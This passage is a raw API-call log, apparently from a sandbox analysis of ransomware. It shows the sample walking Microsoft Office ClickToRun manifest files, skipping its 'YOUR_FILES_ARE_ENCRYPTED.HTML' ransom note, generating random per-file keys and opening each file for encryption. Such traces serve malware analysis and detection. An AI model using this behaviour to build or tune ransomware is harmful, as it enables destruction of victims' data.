"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.802] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=102768) returned 1 [0105.802] GetProcessHeap () returned 0x600000 [0105.802] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.805] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="7B") returned 2 [0105.805] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="83") returned 2 [0105.805] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B0") returned 2 [0105.806] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="7F") returned 2 [0105.806] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="21") returned 2 [0105.806] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="60") returned 2 [0105.806] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="9A") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="71") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="A3") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="FD") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="42") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="35") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="E9") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="05") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A4") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="72") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="D1") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="94") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="FA") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="CE") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="BB") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="3A") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0C") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="15") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="A4") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="54") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B4") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="5A") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="31") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="91") returned 2 [0105.806] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="81") returned 2 [0105.807] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7E") returned 2 [0105.807] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" [0105.808] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.808] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.808] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6584ce48, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x684e, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml", cAlternateFileName="C27FF4~1.XML")) returned 1 [0105.808] StrStrIW (lpFirst="C2RManifest.powerpointmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.808] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned 121 [0105.808] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0105.808] lstrlenW (lpString=".xml") returned 4 [0105.808] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0105.808] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.808] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.809] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=26702) returned 1 [0105.809] GetProcessHeap () returned 0x600000 [0105.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.813] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="D3") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="C8") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="52") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="9F") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="F6") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BF") returned 2 [0105.813] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="13") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="3E") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="B9") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="06") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7B") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B9") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="98") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5D") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="30") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="A3") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="17") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="28") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="CF") returned 2 [0105.813] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="37") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E0") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C3") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="78") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="03") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="F1") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="99") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="1C") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E4") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="FE") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="DA") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="6B") returned 2 [0105.814] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="19") returned 2 [0105.815] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" [0105.815] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.815] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.815] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65d08901, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml", cAlternateFileName="C2B3EB~1.XML")) returned 1 [0105.815] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.815] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned 121 [0105.815] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0105.815] lstrlenW (lpString=".xml") returned 4 [0105.815] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0105.815] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.815] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.816] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=25454) returned 1 [0105.816] GetProcessHeap () returned 0x600000 [0105.816] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.819] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="C2") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="06") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="83") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C0") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="00") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="6D") returned 2 [0105.820] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="26") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="55") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="F4") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="25") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7A") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B5") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6B") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A8") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B0") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="48") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="0A") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="DB") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="8A") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="13") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="8C") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="CF") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3F") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D5") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="0C") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="D0") returned 2 [0105.820] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="F3") returned 2 [0105.821] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="71") returned 2 [0105.821] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="2D") returned 2 [0105.821] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="C7") returned 2 [0105.821] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="03") returned 2 [0105.821] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="78") returned 2 [0105.821] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" [0105.822] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.822] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.822] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65b23f2e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml", cAlternateFileName="C23127~1.XML")) returned 1 [0105.822] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.822] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned 121 [0105.822] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0105.822] lstrlenW (lpString=".xml") returned 4 [0105.822] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0105.822] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.822] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.822] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24486) returned 1 [0105.823] GetProcessHeap () returned 0x600000 [0105.823] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.826] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3A") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="C0") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="27") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="68") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="EE") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="EA") returned 2 [0105.826] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="55") returned 2 [0105.826] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="1A") returned 2 [0105.826] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="CE") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="18") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="8A") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="88") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="E7") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="96") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="94") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="B2") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="7E") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="FF") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C7") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="2B") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="1D") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D8") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="00") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="4E") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E5") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="5D") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="C6") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="0F") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3C") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="5E") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="54") returned 2 [0105.827] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="39") returned 2 [0105.828] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" [0105.828] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.828] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.829] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65b78136, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cAlternateFileName="C2BAB3~1.XML")) returned 1 [0105.829] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.829] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned 121 [0105.829] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0105.829] lstrlenW (lpString=".xml") returned 4 [0105.829] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0105.829] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.829] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.829] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24486) returned 1 [0105.829] GetProcessHeap () returned 0x600000 [0105.829] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0105.884] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A3") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="D4") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="0F") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C6") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="56") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F9") returned 2 [0105.884] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="0E") returned 2 [0105.884] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="65") returned 2 [0105.884] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="04") returned 2 [0105.884] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="6D") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="FC") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="37") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D8") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="CA") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="DB") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="13") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="00") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="EE") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A7") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="40") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="4D") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="69") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="DE") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8B") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="12") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="60") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="CA") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="70") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="BD") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="B2") returned 2 [0105.885] wsprintfW (in: 